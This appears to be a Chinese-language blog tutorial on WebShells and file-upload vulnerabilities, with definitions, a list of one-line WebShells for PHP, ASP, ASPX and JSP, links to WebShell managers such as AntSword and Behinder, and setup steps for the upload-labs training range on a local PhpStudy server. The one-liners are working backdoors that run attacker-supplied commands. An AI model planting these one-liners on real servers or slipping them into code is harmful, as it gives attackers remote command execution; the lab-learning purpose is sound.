重要的事情放前面
文件上传的靶场,建议使用老版本的小皮,即PhpStudy2018
。
原因:靶场太老,千万别给自己找麻烦。
资源下载方式:公众号后台回复《文件上传》,无尖括号
- 资源包括:文件上传漏洞靶场、PhpStudy2018、蚁剑
木马
存储在计算机中的一种非授权的远程控制程序,它可以在计算机管理员未发觉的情况下,开放系统权限,泄露用户信息给攻击者。
后门
一台计算机有65535
个端口,每个端口是计算机与外界连接的”门“,每个门都有计算机提供的一些服务,攻击者利用这些服务的漏洞,获取服务器的权限,为自己非法进入服务器留下一个通道。
WebShell
WebShell
是以asp
、php
、jsp
等网页文件形式存在的一种命令执行环境,常称为网页木马后门。
攻击者可以利用这种网页后门获取服务器的操作权限,控制网站服务器执行各种命令、查看服务器中的各种信息、上传下载文件等操作。
WebShell可以穿越防火墙,使用80端口进行通信
WebShell一般不会在系统日志中留下记录,只会在web日志中留下数据传递记录。
WebShell分类
根据文件大小分类
- 一句话木马:代码简短,通常只有一行代码,使用方便
- 小马:值包含文件上传功能,体积小
- 大马:体积大,包含很多功能,代码通常会进行加密隐藏
根据脚本类型分类 - jsp
- asp
- aspx
- php
常见的一句话木马
PHP
//x是密码
<?php eval($_POST['x'])?>
<?php eval($_GET['x'])?>
<?php assert($_POST['x']);?>
eval()
函数:将字符串作为PHP代码执行。
ASP
//x是密码
<%eval request("x")%>
<%execute request("x")%>
ASPX
//x是密码
<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
<%%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
JSP
//x是密码
<%@ page import="java.io.*"%>
<%Runtime.getRuntime().exec(request.getParameter("x"));%>
WebShell管理工具
C刀:https://github.com/Chora10/Cknife
weevely:https://github.com/epinna/weevely3
蚁剑(AntSword)
- 加载器:
https://github.com/AntSwordProject/AntSword-Loader
- 源码:
https://github.com/AntSwordProject/antSword
冰蝎(Behinder):https://github.com/rebeyond/Behinder
文件上传
所谓文件上传,就是将本地的文件上传到对方网站的服务器上。
文件上传漏洞
一般来说网站只允许用户上传一些图片之类的静态资源,不会让用户上传木马文件等。
为了防止用户上传木马文件,网站开发人员会做一些过滤操作。
攻击者通过某些方法绕过过滤,达到上传木马文件的效果,这就是文件上传漏洞原理。
环境搭建
靶场下载地址:https://github.com/c0ny1/upload-labs
解压后放入到PHPStudy
的网站根目录下
- 老版本小皮的
WWW
路径在:PHPTutorial\WWW
下载旧版本(2018版)的小皮面板,下载地址:https://old.xp.cn/download.html
在浏览器中访问靶场:http://127.0.0.1/upload/
蚁剑下载与安装
下载
下载蚁剑的加载器:https://github.com/AntSwordProject/AntSword-Loader
下载蚁剑源代码:https://github.com/AntSwordProject/antSword
安装
将加载器和源代码解压到不同的文件夹中
打开加载器,点击初始化,选择蚁剑源码所在的目录
配置完成后重启蚁剑即可。
无情的广告时间
哈哈哈哈,又到了大家喜欢的广告时间了,公众号:编码魔坊
,喜欢的话给个关注呗,点击下方小卡片,扫码即可关注,谢谢您的关注!!!